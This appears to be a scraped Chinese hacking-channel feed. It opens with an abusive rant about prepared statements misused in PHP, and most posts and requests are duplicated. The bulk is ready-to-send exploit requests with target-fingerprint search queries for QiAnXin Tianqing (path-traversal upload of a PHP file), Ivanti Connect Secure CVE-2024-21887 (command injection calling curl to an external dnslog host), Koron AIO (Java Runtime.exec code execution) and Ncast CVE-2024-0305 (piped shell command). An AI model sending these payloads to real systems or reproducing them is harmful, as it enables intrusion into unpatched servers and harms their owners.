预编译这个东西很多人都听说过,每次问到sql注入怎么防御的时候大家都会来一句“使用预编译语句”,具体怎么写也不知道。然后某些记了俩菜名就在qq上蹦跶的带黑客似乎觉得,预编译就是个无敌的存在,sql语句只要这么处理了就没漏洞了。这个说法有道理但是不绝对。之前在审一些代码,尤其是php的时候我发现大多数出注入漏洞的预编译语句都有一种共同的思想,我编译我的,你注入你的。我写代码规定PDO,$pdo->quote($xxx)的时候我是你爹,传入个外部可控的转义字符串的时候经常就反转了,你是我爹。你要拿大哥刷经验,哥没意见,你要质疑大哥的实力,哥不高兴。我个人感觉预编译其实是最好审计出注入的,只要你追着变量一行一行跟进函数就行,反正总有一行什么query什么MB_userKey要出事,你预了你妈呢折腾半天还不如开局$id=$_GET['user_id']然后intval()算了,要死也死痛快点。(这玩意注入是注入不了但是容易正常用户卡bug,cjb开发写php的时候搞不清转换后的进制)
哦对,说回qq。phtml那个文件就不说了字面意思的杂种,满屏刀乐混着标签属性和√⑩缩进写得跟小儿麻痹一样。原理其实网上也有很多文章分析过,扒拉了一个典型代码如图。GET方式获取user_id,然后一个try-catch 块,捕获异常,创建$pdo(这就是个例子别管什么root root弱口令)。然后他的预编译,$sql="select * from dvwa.users where user_id={$id}";正常的,预编译也预了。关键就是后面$row=一句,前面id变量是从 GET 请求中获取到的用户参数,外部可控,这里直接将结果赋值给变量 $row,没过滤,你预了个牛魔。占位符替代参数值,先编译,再传值,这三点都做对了才能叫真正的用预编译处理sql语句,否则就是个在第一行死和第十行死的问题
然后最经典的就来了,qq嗨黑搁那xjb嘴硬爆出了超级经典名言,“不同的数据库注入方法是不一样的,你这个说的是mysql,我用mssql或者sqlsever预编译你注入个啥?”
倭瓜说的,在快手和qq上搜黑客等于进了弱智吧,我是非常认可的。高情商:mssql和sqlsever的关系就像玛丽卡和拉达冈的关系一样。低情商:傻逼初中生啥都不会就会报菜名,听了一堆什么“sql注入不同的数据库注入方式不同”,“预编译防止注入”,“关系型数据库”,“mysql”,“mssql”,“sqlsever”就搁那报呢,连我用mssql或者sqlsever预编译这种逆天发言都出来了,一眼丁真,知道这个词然后压根不知道具体啥意思就开始给劲瞎扯名词。扫哥虽然技术含量上简单但是人家是真能日站有作用,啥都没学过的能不能就⑧瞎扯代码审计了爆些典出来笑死个人😅
哦对,说回qq。phtml那个文件就不说了字面意思的杂种,满屏刀乐混着标签属性和√⑩缩进写得跟小儿麻痹一样。原理其实网上也有很多文章分析过,扒拉了一个典型代码如图。GET方式获取user_id,然后一个try-catch 块,捕获异常,创建$pdo(这就是个例子别管什么root root弱口令)。然后他的预编译,$sql="select * from dvwa.users where user_id={$id}";正常的,预编译也预了。关键就是后面$row=一句,前面id变量是从 GET 请求中获取到的用户参数,外部可控,这里直接将结果赋值给变量 $row,没过滤,你预了个牛魔。占位符替代参数值,先编译,再传值,这三点都做对了才能叫真正的用预编译处理sql语句,否则就是个在第一行死和第十行死的问题
然后最经典的就来了,qq嗨黑搁那xjb嘴硬爆出了超级经典名言,“不同的数据库注入方法是不一样的,你这个说的是mysql,我用mssql或者sqlsever预编译你注入个啥?”
倭瓜说的,在快手和qq上搜黑客等于进了弱智吧,我是非常认可的。高情商:mssql和sqlsever的关系就像玛丽卡和拉达冈的关系一样。低情商:傻逼初中生啥都不会就会报菜名,听了一堆什么“sql注入不同的数据库注入方式不同”,“预编译防止注入”,“关系型数据库”,“mysql”,“mssql”,“sqlsever”就搁那报呢,连我用mssql或者sqlsever预编译这种逆天发言都出来了,一眼丁真,知道这个词然后压根不知道具体啥意思就开始给劲瞎扯名词。扫哥虽然技术含量上简单但是人家是真能日站有作用,啥都没学过的能不能就⑧瞎扯代码审计了爆些典出来笑死个人😅
👍7
奇安信天擎rptsvr任意文件上传
banner="QiAnXin web server" banner="360 web server" body="appid\":\"skylar6" body="/task/index/detail?id={ item.id }" body="已过期或者未授权,购买请联系4008-136-360"
POST /rptsvr/upload HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36Connection: closeContent-Length: 414Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460Upgrade-Insecure-Requests: 1-----------------------------55433477442814818502792421460Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/TController2.php"Content-Type: text/x-python<?phpphpinfo();?>-----------------------------55433477442814818502792421460Content-Disposition: form-data; name="token"skylar_report-----------------------------55433477442814818502792421460
http://xxxx/application/api/controllers/TController.php
banner="QiAnXin web server"
POST /rptsvr/upload HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36Connection: closeContent-Length: 414Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460Upgrade-Insecure-Requests: 1-----------------------------55433477442814818502792421460Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/TController2.php"Content-Type: text/x-python<?phpphpinfo();?>-----------------------------55433477442814818502792421460Content-Disposition: form-data; name="token"skylar_report-----------------------------55433477442814818502792421460
http://xxxx/application/api/controllers/TController.php
Ivanti Connect Secure远程命令注入漏洞(CVE-2024-21887)
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36Connection: closeAccept-Encoding: gzip, deflate
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36Connection: closeAccept-Encoding: gzip, deflate
👍3🥰2
科荣AIO管理系统远程代码执行漏洞
body="changeAccount('8000')"
POST /UtilServlet HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 324operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
body="changeAccount('8000')"
POST /UtilServlet HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 324operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
👍3
CVE-2024-0305 Ncast 平台RCE
icon_hash="-1253433910"
POST /classes/common/busiFacade.php HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 98Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
icon_hash="-1253433910"
POST /classes/common/busiFacade.php HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 98Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
js攻击面拓展,正则提取JavaScript中url信息工具,可检验敏感参数,接口和挖掘未授权漏洞,手法神必备
https://github.com/BishopFox/jsluice
https://github.com/ttstormxx/jjjjjjjjjjjjjs
https://github.com/InitRoot/BurpJSLinkFinder
https://github.com/gh0stkey/HaE
https://github.com/RetireJS/retire.js
https://github.com/BishopFox/jsluice
https://github.com/ttstormxx/jjjjjjjjjjjjjs
https://github.com/InitRoot/BurpJSLinkFinder
https://github.com/gh0stkey/HaE
https://github.com/RetireJS/retire.js
👍1😁1🤔1
